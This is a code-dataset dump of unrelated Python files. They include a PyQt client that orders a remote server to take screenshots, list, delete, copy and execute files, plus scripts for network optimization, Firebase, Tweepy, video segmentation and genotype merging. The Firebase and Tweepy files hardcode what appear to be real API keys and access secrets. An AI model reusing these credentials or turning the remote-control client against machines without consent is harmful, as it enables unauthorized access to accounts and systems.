'Copies a file', self)\n\t\tcopyAction.triggered.connect(self.copy)\n\t\tself.toolBar = self.addToolBar(\"Copy a file\")\n\t\tself.toolBar.addAction(copyAction)\n\n\t\texecAction = QtGui.QAction(QtGui.QIcon('images/execute.png'), 'Executes a file', self)\n\t\texecAction.triggered.connect(self.execute)\n\t\tself.toolBar = self.addToolBar(\"Execute a file\")\n\t\tself.toolBar.addAction(execAction)\n\n\t\tcolor = QtGui.QColor(0, 0, 0)\n\n\t\tfontColor = QtGui.QAction('Font bg Color', self)\n\t\tfontColor.triggered.connect(self.color_picker)\n\t\tself.toolBar.addAction(fontColor)\n\n\t\tself.styleChoice = QtGui.QLabel(\"\", self)\n\t\tself.styleChoice.move(0, 0)\n\t\tself.styleChoice.setGeometry(1, 1, 800, 400)\n\t\tcomboBox = QtGui.QComboBox(self)\n\t\tcomboBox.addItem(\"motif\")\n\t\tcomboBox.addItem(\"Windows\")\n\t\tcomboBox.addItem(\"cde\")\n\t\tcomboBox.addItem(\"Plastique\")\n\t\tcomboBox.addItem(\"Cleanlooks\")\n\n\t\tcomboBox.move(0, 50)\n\t\tself.styleChoice.move(0, 150)\n\t\tcomboBox.activated[str].connect(self.style_choice)\n\n\t\tself.show()\n\n\tdef color_picker(self):\n\t\tcolor = QtGui.QColorDialog.getColor()\n\t\tself.styleChoice.setStyleSheet(\"QWidget { background-color: %s}\" % color.name())\n\n\tdef style_choice(self, text):\n\t\tself.styleChoice.setText(text)\n\t\tQtGui.QApplication.setStyle(QtGui.QStyleFactory.create(text))\n\n\tdef close_application(self):\n\t\tchoice = QtGui.QMessageBox.question(self, 'Qutting!', \"Are you sure you want to exit the app?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)\n\t\tif choice == QtGui.QMessageBox.Yes:\n\t\t\tsys.exit()\n\t\telse:\n\t\t\tpass\n\n\tdef print_screen(self):\n\t\tself.send_request_to_server(self.my_socket, \"TAKE_SCREENSHOT\")\n\t\tself.send_request_to_server(self.my_socket, \"SEND_FILE B:/newimage.jpg\")\n\t\tnewfile = open('B:\\\\newimage.jpg', 'wb')\n\t\twhile True:\n\t\t\tdata = self.my_socket.recv(1024)\n\t\t\tnewfile.write(data)\n\t\t\tif \"Image sent!\" in data:\n\t\t\t\tbreak\n\t\t\tpopup = QtGui.QMessageBox.information(self, 'Image recieved!', 'The image has been recevied.')\n\n\tdef directory(self):\n\t\ttext, ok = QInputDialog.getText(self, 'Enter your desired directory', 'Please entire your desired directory:')\n\t\tif ok and text != '':\n\t\t\ttext = 'DIR ' + text\n\t\t\tself.send_request_to_server(self.my_socket, str(text))\n\t\t\tpopup = QtGui.QMessageBox.information(self, 'Contents:', str(self.my_socket.recv(1024)))\n\n\tdef delete(self):\n\t\ttext, ok = QInputDialog.getText(self, 'Enter your desired file', 'Please entire your desired file:')\n\t\tif ok and text != '':\n\t\t\ttext = 'DELETE ' + text\n\t\t\tself.send_request_to_server(self.my_socket, str(text))\n\t\t\tpopup = QtGui.QMessageBox.information(self, 'Deleted!', 'File has been deleted!')\n\n\tdef copy(self):\n\t\ttext1, ok1 = QInputDialog.getText(self, 'Enter your desired file', 'Please entire your desired file:')\n\t\ttext2, ok2 = QInputDialog.getText(self, 'Enter your desired destination', 'Please entire your desired destination:')\n\t\tif ok1 and ok2 and text1 != '' and text2 != '':\n\t\t\ttext = 'COPY ' + text1 + \" \" + text2\n\t\t\tself.send_request_to_server(self.my_socket, str(text))\n\t\t\tpopup = QtGui.QMessageBox.information(self, 'Copied!', 'File has been copied!')\n\n\tdef execute(self):\n\t\ttext, ok = QInputDialog.getText(self, 'Enter your desired file', 'Please entire your desired file:')\n\t\tif ok and text != '':\n\t\t\ttext = \"EXECUTE \" + text\n\t\t\tself.send_request_to_server(self.my_socket, str(text))\n\t\t\tpopup = QtGui.QMessageBox.information(self, 'Executed!', 'File has been executed!')\n\n\t@staticmethod\n\tdef send_request_to_server(my_socket, request):\n\t\tmy_socket.send(request)\n\napp = QtGui.QApplication(sys.argv)\nGUI = Window()\nsys.exit(app.exec_())\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"137488035","text":"\"\"\"\nProject 1 - Problem 2 (P1)\n\"\"\"\n\n########################################################\n######## X-MAC: Trade_off Energy with Delay using GT\n########################################################\n# Radio subsystem varaible definition\n\nP = 32. # Payload [byte]\nR = 31.25 # CC2420 Radio Rate [kbyte/s = Byte/ms]\nD = 8 # number of levels\nC = 5 # neighbors size (connectivity)\nN = C*D**2 # number of nodes\n#### BE CAREFUL: Times are in milliseconds (ms)\nLmax = 5000. # Maximal allowed Delay (ms)\nEmax = 1. # MAximal Energy Budjet (J)\n\nL_pbl = 4. # preamble length [byte]\nL_hdr = 9. + L_pbl # header length [byte]\nL_ack = 9. + L_pbl # ACK length [byte]\nL_ps = 5. + L_pbl # preamble strobe length [byte]\n\nTal = 0.95 # ack listen period [ms]\nThdr = L_hdr/R # header transmission duration [ms]\nTack = L_ack/R # ACK transmission duration [ms]\nTps = L_ps/R # preamble strobe transmission duration [ms]\nTcw = 15*0.62 # Contention window size [ms]\nTcs = 2.60 # Time [ms] to turn the radio into TX and probe the channel (carrier sense)\nTdata = Thdr + P/R + Tack # data packet transmission duration [ms]\n\n### Sampling frequency\n# Fs = 1.0/(60*30*1000) # e.g. Min traffic rate 1 pkt/half_hour = 1/(60*30*1000) pk/ms\nFs = 1./(5*60*1000) #default\n\n# Sleep period: Parameter Bounds\nTw_max = 500. # Maximum Duration of Tw in ms\nTw_min = 100. # Minimum Duration of Tw in ms\n\n\ndef Nd(d):\n if d == 0:\n return 1\n return (2*d - 1)*C\n\ndef Id(d):\n if d == 0:\n return C\n elif d == D:\n return 0\n return (2*d + 1)/(2*d - 1)\n # return Nd(d+1)/Nd(d)\n\ndef Fout(d):\n if d == D:\n return Fs\n return Fs*(D**2 - d**2 + 2*d - 1)/(2*d - 1)\n # return FI(d)+Fs\n\ndef FI(d):\n if d == 0:\n return Fs*C*D**2\n return Fs*(D**2 - d**2)/(2*d - 1)\n # return Id(d)*Fout(d+1)\n\ndef FB(d):\n return (C - Id(d))*Fout(d)\n\ndef Etx(d, Tw):\n return (Tcs + Tal + Ttx(Tw))*Fout(d)\n\ndef Ttx(Tw):\n return (Tw/2 + Tack + Tdata)\n\n# d = 1 # first ring\n# α1 = Tcs + Tal + (3/2)*Tps*((Tps + Tal)/2 + Tack + Tdata)*FB(d)\n# α2 = Fout(d)/2\n# α3 = ((Tps + Tal)/2 + Tcs + Tal + Tack + Tdata)*Fout(d) + ((3/2)*Tps + Tack + Tdata)*FI(d) + (3/4)*Tps*FB(d)\n\n# d = D # last ring\n# β1 = sum(1/2 for i in range(1, d+1))\n# β2 = sum(Tcw/2 + Tdata for i in range(1, d+1))\n\n# # print(α1, α2, α3, β1, β2)\n\n# E = lambda Tw: α1/Tw + α2*Tw + α3\n# L = lambda Tw: β1*Tw + β2\n\n#########\n# Plots #\n#########\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\n\n# (a) The energy as a function of Tw, where Tw=[Twmin, Twmax] = [100, 500] ms\n# Tw = np.linspace(Tw_min/1000,Tw_max/1000,100)\n# Tw = np.linspace(Tw_min,Tw_max,100)\nTw_linsp = np.linspace(70,500,100)\n# Tw_linsp = np.linspace(70/1000,500/1000,100)\n\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\nax.spines['left'].set_position('center')\nax.spines['bottom'].set_position('zero')\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\nax.xaxis.set_ticks_position('bottom')\nax.yaxis.set_ticks_position('left')\n\n# plt.plot(Tw, E(Tw), 'blue', label='Energy E(Tw)')\n# plt.legend(loc='lower left')\n# plt.xlabel(\"Tw\")\n# plt.show()\n\n# minute = [1,5,10,15,20,25,30] #minutes\n# Fs = 1./(minute[1]*60*1000)\n\n# d = 1 # first ring\n# α1 = Tcs + Tal + (3/2)*Tps*((Tps + Tal)/2 + Tack + Tdata)*FB(d)\n# α2 = Fout(d)/2\n# α3 = ((Tps + Tal)/2 + Tcs + Tal + Tack + Tdata)*Fout(d) + ((3/2)*Tps + Tack + Tdata)*FI(d) + (3/4)*Tps*FB(d)\n\n# d = D # last ring\n# β1 = sum(1/2 for i in range(1, d+1))\n# β2 = sum(Tcw/2 + Tdata for i in range(1, d+1))\n\n# E = lambda Tw: α1/Tw + α2*Tw + α3\n# L = lambda Tw: β1*Tw + β2\n\n\n\n# %%\n################\n# Optimization #\n################\n\n# def P1():\nfrom gpkit import Variable, VectorVariable, Model\nfrom gpkit.nomials import Monomial, Posynomial, PosynomialInequality\n\nLmax_range = [1000,2000,3000,4000,5000]\n\nfor minute in [5,10,15,20,25,30]: #minutes\n Fs = 1./(minute*60*1000)\n\n d = 1 # first ring\n α1 = Tcs + Tal + (3/2)*Tps*((Tps + Tal)/2 + Tack + Tdata)*FB(d)\n α2 = Fout(d)/2\n α3 = ((Tps + Tal)/2 + Tcs + Tal + Tack + Tdata)*Fout(d) + ((3/2)*Tps + Tack + Tdata)*FI(d) + (3/4)*Tps*FB(d)\n\n d = D # last ring\n β1 = sum(1/2 for i in range(1, d+1))\n β2 = sum(Tcw/2 + Tdata for i in range(1, d+1))\n\n E = lambda Tw: α1/Tw + α2*Tw + α3\n L = lambda Tw: β1*Tw + β2\n\n Tw = Variable(\"Tw\")\n\n objective = α1/Tw + α2*Tw + α3\n constraints = [ β1*Tw + β2 <= 5000,\n Tw >= Tw_min,\n Id(0)*Etx(1,Tw) <= 1/4\n ]\n m = Model(objective, constraints)\n sol = m.solve(verbosity=0)\n print(str(minute) + 'min:')\n print(sol.table())\n # print(sol[\"cost\"])\n # print(sol[\"variables\"][Tw])\n\n # Plot Energy(Tw)\n plt.plot(Tw_linsp, E(Tw_linsp), random.choice(\"bgrcmyk\"), label='Energy E(Tw) for Fs(' + str(minute) + 'min) = ' + str(Fs)[:4] + str(Fs)[-4:])\n\n # Plot Energy(Tw) optimal point\n ax.scatter(sol[\"variables\"][Tw], sol[\"cost\"], color='red')\n\nplt.title('Lmax = ' + str(5000))\nplt.xlabel(\"Tw [ms]\")\nplt.legend(loc='upper right')\nplt.show()\n\n# %%\n","sub_path":"ex2_p1.py","file_name":"ex2_p1.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"43390372","text":"import pyrebase\n\nconfig = {\n \"apiKey\": \"AIzaSyDKstoSby1YdpTfy7xqAiDPt5Ta50PoOIw\",\n \"authDomain\": \"nomad-e1934.firebaseapp.com\",\n \"databaseURL\": \"https://nomad-e1934.firebaseio.com\",\n \"projectId\": \"nomad-e1934\",\n \"storageBucket\": \"nomad-e1934.appspot.com\",\n}\n\nfirebase = pyrebase.initialize_app(config)\n\n# Database Variable\ndb = firebase.database()\n\ncurrentState = ''\n\ndef getState():\n state = db.child(\"PiMove\").get()\n currentState = state\n\ndef stream_handler(message):\n print(message[\"event\"])\n print(message[\"path\"]) \n print(message[\"data\"])\n\n\nmy_stream = db.child(\"PiMove\").child(\"Movement\").stream(stream_handler)","sub_path":"nomadBackend/python/nomadBrain.py","file_name":"nomadBrain.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"264556647","text":"#!/usr/bin/python\n\nimport csv\n \nencabezado = True\n\nwith open('archivo.csv') as File:\n reader = csv.reader(File, delimiter=',', quotechar=',',quoting=csv.QUOTE_MINIMAL)\n for row in reader:\n if (encabezado == False):\n if float(row[4])>1200 :\n print(row[1])\n encabezado = False","sub_path":"computacion2/exercises/ejercicio3.py","file_name":"ejercicio3.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"352247953","text":"from django.conf.urls import patterns, url\nfrom rmc import views\n\nurlpatterns = patterns('',\n\turl(r'^$', views.home, name='home'),\n\turl(r'^chef/', views.chef, name='chef'),\n\turl(r'^events/', views.events, name='events'),\n\turl(r'^menus/', views.menus, name='menus'),\n\turl(r'^inquiry/', views.inquiry, name='inquiry'),\n)","sub_path":"rmc/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"138655545","text":"import tweepy\n\n# consumer key and secret\nconsumer_key = 'Lfz4zIl81lxWH2JsnjYRjfSSy'\nconsumer_secret = 'UJOKsHAGOh44V8rwp7oRH5ljeXhR2ph2vNd85FpKH0jxLJm1OE'\n\n# access token and secret\naccess_token = '746872621-vGxyYKMQvIMVC2qyNnexlGllJZGJ1gS9C0GynFKc'\naccess_token_secret = 'TgNBfyCs92r1NMDxyR1rL00dqY8FAXTwYV8yFXJFhzmMQ'\n\n# connecting for authentication\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n# OAuthHandler equipped with an access token\nauth.set_access_token(access_token, access_token_secret)\n\napi = tweepy.API(auth)\n\nget_data = api.search('@Abhishekkumbhaj')\n\nfor i in get_data:\n print(i.text)\n","sub_path":"TextBlob__Tweepy/tweepy_demo.py","file_name":"tweepy_demo.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"463323691","text":"import csv\nimport qrcode\nimport base64\nfrom io import BytesIO\n\n\ndef save_iterable_to_a_file(iterable, filename):\n f = open(filename, \"w+\")\n [f.write(f\"{x}\\n\") for x in iterable]\n f.close()\n\n\ndef read_data(file_name):\n \"\"\"\nfrom applications.core.utils import read_data\nread_data(\"fixtures/info.csv\")\n :param file_name:\n :return:\n \"\"\"\n info_file = open(file_name)\n reader = csv.reader(info_file)\n all_rows = list()\n for r in reader:\n all_rows.append(r)\n\n return all_rows\n\n\ndef extract_categories(file_name):\n \"\"\"\nfrom applications.core.utils import extract_categories\nextract_categories(\"fixtures/info.csv\")\n :param file_name:\n :return:\n \"\"\"\n all_rows = read_data(file_name)\n categories = {r[3].lower() for r in all_rows}\n subcategories = {r[4].lower() for r in all_rows}\n categories_attached = {f\"{r[3].lower()} - {r[4].lower()}\" for r in all_rows}\n save_iterable_to_a_file(categories, \"fixtures/categories.txt\")\n save_iterable_to_a_file(subcategories, \"fixtures/subcategories.txt\")\n save_iterable_to_a_file(categories_attached, \"fixtures/categories_attached.txt\")\n\n\ndef get_base64_qr_code(data):\n qr_image = qrcode.QRCode(\n version=1,\n error_correction=qrcode.constants.ERROR_CORRECT_L,\n box_size=10,\n border=4,\n )\n qr_image.add_data(data)\n qr_image.make(fit=True)\n\n img = qr_image.make_image()\n\n buffered_image = BytesIO()\n img.save(buffered_image, format=\"JPEG\")\n return base64.b64encode(buffered_image.getvalue()).decode()","sub_path":"applications/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"135274231","text":"import sys\nimport os\nimport cv2\nimport os.path as osp\nimport numpy as np\nimport time\nimport pdb\nfrom collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils import data\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\n\n# from deeplab.model_dplv3_plus_meta_v3 import Res_Dplv3_Decoder \nfrom deeplab.model_dplv3_plus_meta_v2 import Res_Dplv3_Decoder \nfrom deeplab.datasets import DavisTestDataset\n# from new_loss import class_balanced_cross_entropy_loss as balanced_bce_loss \n\nfrom mvos_utils import *\nimport pdb\n\n# gpu setting \nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\ncudnn.enabled = True\ncudnn.benchmark = True\n\n# meta learning setting\nlayer5_bn_name = ['layer5.assp.0.1', 'layer5.assp.1.1', 'layer5.assp.2.1', 'layer5.assp.3.1', \n 'layer5.image_pool.2', 'layer5.encode_fea.1', 'layer5.low_level_fea.1',\n 'layer5.decode_1.1', 'layer5.decode_2.1']\ntrain_mode = 'block_4_5'\nmeta_restore_from = './snapshots/meta_davis17.pth'\nnormal_restore_from = './snapshots/base_seg.pth'\nn_meta_init = 50\nname_suffix = ''\n\n\n# dataset setting\ncfg = {}\ncfg['img_root'] = './dataset/davis/JPEGImages/480p'\ncfg['gt_root'] = './dataset/davis/Annotations/480p_split'\ncfg['list_root'] = './dataset/davis/ImageSets/2017/val_w_imgs_no.txt'\ncfg['crop_size'] = (480, 854)\ncfg['img_mean'] = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32)\ncfg['random_scale'] = False\ncfg['random_mirror'] = False\ncfg['ignore_label'] = 0\ncfg['num_steps'] = n_meta_init\ncfg['batch_size'] = 1\ncfg['max_label'] = 1.0\n\n\n# get sequences\nimg_ids = [i_id.strip() for i_id in open(cfg['list_root'])]\nseq_numbers = len(img_ids)\n\n\n# create network\nmodel = Res_Dplv3_Decoder(num_classes=1, output_stride=16)\ninterp = nn.Upsample(size=cfg['crop_size'], mode='bilinear')\ncriterion = nn.BCEWithLogitsLoss().cuda()\nsigmoid = nn.Sigmoid()\n\n\n# testing save root\nmeta_model_name = meta_restore_from.split('/')[-1][:-4]\nsave_root_prefix = '_'.join(['./results/davis-17-val/' + meta_model_name, str(n_meta_init), name_suffix])\n\ntotal_runtime = 0.\n# process sequence\nfor i in range(seq_numbers):\n cur_seq_name = img_ids[i].split()[0]\n cur_seq_range = int(img_ids[i].split()[1])\n cur_seq_image_path = osp.join(cfg['img_root'], cur_seq_name)\n cur_seq_label_path = osp.join(cfg['gt_root'], cur_seq_name)\n\n # set learnable parameters\n train_all_features = set_trainable_feas(train_mode)\n model.set_learnable_params(train_all_features, layer5_bn_name)\n\n # load non-meta-trained model\n saved_state_dict = torch.load(normal_restore_from)\n model.load_state_dict(saved_state_dict)\n bn_params = get_bn_params(saved_state_dict, train_all_features, layer5_bn_name)\n\n # load meta-trained model\n saved_state_dict = torch.load(meta_restore_from)\n meta_init = saved_state_dict['meta_init']\n meta_alpha = saved_state_dict['meta_alpha']\n model.copy_meta_weights(meta_init)\n model.train()\n model.cuda()\n\n # meta-initialize the model\n model_weights = OrderedDict()\n for name, p in model.named_parameters():\n if name.split('.')[0] in train_all_features and name not in bn_params:\n model_weights[name] = p\n\n # frozen bn or not\n for name, m in model.named_modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n\n ol_trainloader = data.DataLoader(DavisTestDataset(cfg, cur_seq_name), batch_size=cfg['batch_size'],\n shuffle=True, num_workers=0, pin_memory=True)\n\n # meta-finetune on first frame\n tic = time.time()\n print (\"Meta-Training on %s...\" % cur_seq_name)\n for i_iter, batch in enumerate(ol_trainloader):\n image, label = batch\n image = Variable(image).cuda()\n label = Variable(label).cuda()\n pred = interp(model.forward(image, model_weights, train_mode, bn_params))\n\n loss = criterion(pred, label)\n grads = torch.autograd.grad(loss, model_weights.values(), retain_graph=False, create_graph=True)\n model_weights = OrderedDict((name, param - torch.mul(meta_alpha,grad)) for \n ((name, param), (_, meta_alpha), grad) in\n zip(model_weights.items(), meta_alpha.items(), grads))\n #print ('loss is %f' % loss.data.cpu().numpy())\n \n #if i_iter == n_meta_init:\n # break\n\n print ('Meta fine-tuning time is : %.2f' % (time.time() - tic))\n\n # update model parameters\n model.copy_meta_weights(model_weights)\n\n\n # online testing\n model.eval()\n print (\"Evaluate on %s...\" % cur_seq_name)\n cur_save_root = save_root_prefix + '/' + cur_seq_name + '/'\n if not osp.exists(cur_save_root):\n os.makedirs(cur_save_root)\n\n output = label.data[0, 0].cpu().numpy()\n output = np.array(output*255, dtype=np.uint8)\n cv2.imwrite(cur_save_root + '00000.png', output)\n for j in range(1, cur_seq_range):\n # tic = time.time()\n img_file = osp.join(cur_seq_image_path, '%05d' % j + '.jpg')\n img, ori_img_size = load_image_label_davis17(img_file, cfg['crop_size'])\n output = model(Variable(img, volatile = True).cuda())\n output = sigmoid(interp(output)).cpu().data[0,0].numpy()\n # print ('Per frame forward time is : %.2f' % (time.time() - tic))\n if not (ori_img_size==cfg['crop_size']):\n #output = cv2.resize(output, ori_img_size[::-1], interpolation = cv2.INTER_NEAREST)\n output = cv2.resize(output, ori_img_size[::-1], interpolation = cv2.INTER_LINEAR)\n output = np.array(output*255, dtype=np.uint8)\n cv2.imwrite(cur_save_root + '/%05d' % j + '.png', output)\n\n total_runtime += (time.time() - tic) / (cur_seq_range - 1)\n\nprint ('Average per-frame runtime is : {}'.format(total_runtime/seq_numbers))\n","sub_path":"demo_mvos_davis17.py","file_name":"demo_mvos_davis17.py","file_ext":"py","file_size_in_byte":5937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"587329811","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom itertools import *\nfrom operator import itemgetter\nfrom fnmatch import fnmatch\nimport sys, csv\nimport time\n\ndef group_wc_in_full(d_wc, merge_full):\n reslist = []\n res_no_matches = []\n for wc in d_wc:\n matches = 0\n for full in merge_full:\n if match(full[1], wc[1]):\n matches += 1\n if matches == 1:\n cont = 0\n for full in merge_full:\n if match(full[1], wc[1]):\n new_key = full[0] + \", (\" + wc[0] + \")\"\n merge_full[cont] = (new_key, full[1])\n cont += 1\n if matches > 1:\n cont = 0\n for full in merge_full:\n if match(full[1], wc[1]):\n new_key = full[0] + \", [\" + wc[0] + \"]\"\n merge_full[cont] = (new_key, full[1])\n cont += 1\n if matches == 0:\n res_no_matches.append(wc)\n return merge_full, res_no_matches\n\n\ndef group_no_wc(mergelist):\n reslist = []\n total_keys = []\n for i in range(len(mergelist)):\n isMatch = False\n compared = False\n keys = []\n anyval = None\n keys.append(mergelist[i][0])\n if mergelist[i][0] in total_keys:\n continue\n for j in range(i + 1, len(mergelist)):\n if mergelist[j][0] in total_keys:\n continue\n compared = True\n if mergelist[i][1] == mergelist[j][1]:\n isMatch = True\n keys.append(mergelist[j][0])\n total_keys.append(mergelist[j][0])\n anyval = mergelist[j][1]\n if compared:\n if isMatch:\n str_keys = \", \".join(keys)\n new_item = (str_keys, anyval)\n reslist.append(new_item)\n else:\n reslist.append(mergelist[i])\n return reslist\n\n\ndef match(v1, v2):\n if not \"-\" in v1 and not \"-\" in v2:\n return v1 == v2\n v1_reg = v1.replace(\"-\", \"?\")\n cont = 0\n for s in v2:\n if s == \"-\":\n v1_reg = v1_reg[:cont] + \"?\" + v1_reg[cont + 1:]\n cont += 1\n return fnmatch(v2, v1_reg)\n\n\ndef group_nonmatched(nonmatched):\n pivot = nonmatched[0]\n res = []\n res.append(pivot)\n for i in range(1, len(nonmatched)):\n count = 0\n keys = []\n keys.append(nonmatched[i][0])\n for j in range(len(res)):\n try:\n a = res[j]\n except IndexError:\n continue\n if match(nonmatched[i][1], res[j][1]):\n count += 1\n keys.append(str(res[j][0]))\n del (res[j])\n if count == 0:\n res.append(nonmatched[i])\n else:\n new_tuple = (\", \".join(keys), nonmatched[i][1])\n res.append(new_tuple)\n for i in range(len(res)):\n res[i] = (\"{\" + res[i][0] + \"}\", res[i][1])\n return res\n\n\ndef merger(input_file_name, output_file_name):\n t = time.process_time()\n input_file = open(input_file_name, 'r', encoding='utf8')\n input_file_csv = csv.reader(input_file, delimiter=',')\n input_file_list = list(input_file_csv)\n d = {}\n print('start', len(input_file_list[1:]))\n for line in input_file_list[1:]:\n str_line = \"\".join(line[3:len(line)])\n d[line[0]] = str_line\n input_file.close()\n # d_full = list((key, value) for key, value in d.iteritems())\n d_no_wc = list((key, value) for key, value in d.items() if not \"-\" in value)\n d_wc = list((key, value) for key, value in d.items() if \"-\" in value)\n\n # 1- merge_full <= MERGE d_no_wc\n merge_full = group_no_wc(d_no_wc)\n\n # 2- merge_full_wc <= MERGE d_wc in merge_full\n merge_full_wc, wc_no_match = group_wc_in_full(d_wc, merge_full)\n\n # 3 merge nonmatched\n if len(wc_no_match) > 0:\n merged_wc_no_match = group_nonmatched(wc_no_match)\n else:\n merged_wc_no_match = []\n\n final = merged_wc_no_match + merge_full_wc\n idx = 0\n for row in final:\n positions = {}\n ids = row[0]\n ids = ids.replace(\"(\", \"\").replace(\")\", \"\")\n ids = ids.replace(\"[\", \"\").replace(\"]\", \"\")\n ids = ids.replace(\"{\", \"\").replace(\"}\", \"\")\n ids = ids.replace(\" \", \"\")\n ids = ids.split(',')\n for id in ids:\n id_clean = id.replace(\" \", \"\")\n for line in input_file_list:\n if line[0] == id_clean:\n positions.setdefault(line[1], []).append((id_clean, line[2]))\n # get most common element in list (dict keys)\n # if position:\n if len(positions) > 0:\n chromosome = max(set(positions.keys()), key=list(positions.keys()).count)\n _id, position = min(positions[chromosome], key=lambda x: x[1])\n final[idx] += (chromosome, position, _id,)\n else:\n final[idx] += ('', '', '',)\n idx += 1\n output_file = open(output_file_name, 'w')\n for item in final:\n row = list()\n row.append('\"' + item[0] + '\"') # ids\n row.append(item[2]) # chromosome\n row.append(item[3]) # position\n for c in item[1]:\n row.append(c)\n output_file.write(\",\".join(row) + \"\\n\")\n print('end', len(final))\n elapsed_time = time.process_time() - t\n print('in seconds: ', elapsed_time)\n output_file.close()\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser() # pylint: disable=invalid-name\n parser.add_argument(\"-i\", \"--input\", help=\"Input file\")\n parser.add_argument(\"-o\", \"--output\", help=\"Output file\")\n args = parser.parse_args() # pylint: disable=invalid-name\n merger(args.input, args.output)\n","sub_path":"merger.py","file_name":"merger.py","file_ext":"py","file_size_in_byte":5743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"533665542","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ilp - a tag based file indexer\n#\n# Author: slowpoke \n#\n# This program is Free Software under the non-terms\n# of the Anti-License. Do whatever the fuck you want.\n\nimport os\n\nfrom .utils import funcmap, funcset\n\n\nclass Index:\n\n \"\"\"A collection of files and their associated tags.\n\n This object is immutable and changes no other state. All methods which\n would cause a state change return a new index object instead, with the\n changes applied.\n\n The index contains three major data structures:\n\n - a mapping of files to their content's hashes\n - a mapping of hashes to all filenames they identify\n - a mapping of all tags names to a set of the filenames they tag\n\n \"\"\"\n\n files = property(lambda self: self._files)\n tags = property(lambda self: self._tags)\n hashes = property(lambda self: self._hashes)\n\n def __init__(self, files=None, tags=None, hashes=None):\n self._files = funcmap() if files is None else funcmap(files)\n self._tags = funcmap() if tags is None else funcmap(tags)\n self._hashes = funcmap() if hashes is None else funcmap(hashes)\n\n @classmethod\n def new(cls, files=None, tags=None, hashes=None):\n return cls(files, tags, hashes)\n\n def add_file(self, path, hashstring):\n \"\"\"Add a new file to the index.\"\"\"\n if path in self.files and self.files.get(path) != hashstring:\n raise ValueError(\n \"Path exists in the database, but has a different hash.\")\n new_files = self.files.set(path, hashstring)\n pathlist = self.hashes.get(hashstring, funcset())\n new_hashes = self.hashes.set(\n hashstring,\n pathlist.add(path))\n return self.new(new_files, self.tags, new_hashes)\n\n def remove_file(self, path):\n \"\"\"Remove a path from the index.\n\n NOTE: Even if you remove the last duplicate of a file from the index,\n it will still store the hash, albeit with an empty list of paths\n associated with it.\n\n \"\"\"\n if not path in self.files:\n raise KeyError(\"Path not in the index: {}\".format(path))\n hashstring = self.files.get(path)\n new_files = self.files.remove(path)\n pathlist = self.hashes.get(hashstring, funcset())\n new_hashes = self.hashes.set(\n hashstring,\n pathlist.discard(path))\n return self.new(new_files, self.tags, new_hashes)\n\n def add_tag(self, name):\n \"\"\"Add a new tag to the index.\n\n This method will silently return if the tag already exists.\n\n \"\"\"\n if name in self.tags:\n raise KeyError(\"Tag already in the index: {}\".format(name))\n return self.new(\n self.files,\n self.tags.set(name, funcset()),\n self.hashes)\n\n def remove_tag(self, name):\n \"\"\"Remove a tag from the index.\"\"\"\n if name not in self.tags:\n raise KeyError(\"Tag not in the index: {}\".format(name))\n return self.new(\n self.files,\n self.tags.remove(name),\n self.hashes)\n\n def tag_file(self, path, tag_name):\n \"\"\"Tag a file.\"\"\"\n if tag_name not in self.tags:\n raise KeyError(\"Tag not in the index: {}\".format(tag_name))\n if path not in self.files:\n raise KeyError(\"Path not in the index: {}\".format(path))\n hashstring = self.files.get(path)\n new_tag = self.tags.get(tag_name).add(hashstring)\n return self.new(\n self.files,\n self.tags.set(tag_name, new_tag),\n self.hashes)\n\n def untag_file(self, path, tag_name):\n \"\"\"Untag a file.\"\"\"\n if tag_name not in self.tags:\n raise KeyError(\"Tag not in the index: {}\".format(tag_name))\n if path not in self.files:\n raise KeyError(\"Path not in the index: {}\".format(path))\n hashstring = self.files.get(path)\n new_tag = self.tags.get(tag_name).discard(hashstring)\n return self.new(\n self.files,\n self.tags.set(tag_name, new_tag),\n self.hashes)\n\n def file_has_tag(self, path, tag_name):\n \"\"\"Check if a file is tagged by a tag.\"\"\"\n if tag_name not in self.tags:\n # if the tag doesn't exist, no path can be tagged by it.\n return False\n tag = self.tags.get(tag_name)\n hashstring = self.files.get(path)\n return hashstring in tag\n\n def tags_of_file(self, path):\n \"\"\"Return the names of all tags which are tagging a file.\"\"\"\n hashstring = self.files.get(path)\n return funcset(tag_name\n for tag_name, tag in self.tags.items()\n if hashstring in tag)\n","sub_path":"ilp/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"91336256","text":"import urllib.request\nimport os\n\n# Define a function so you can rip the html from a target domain and print 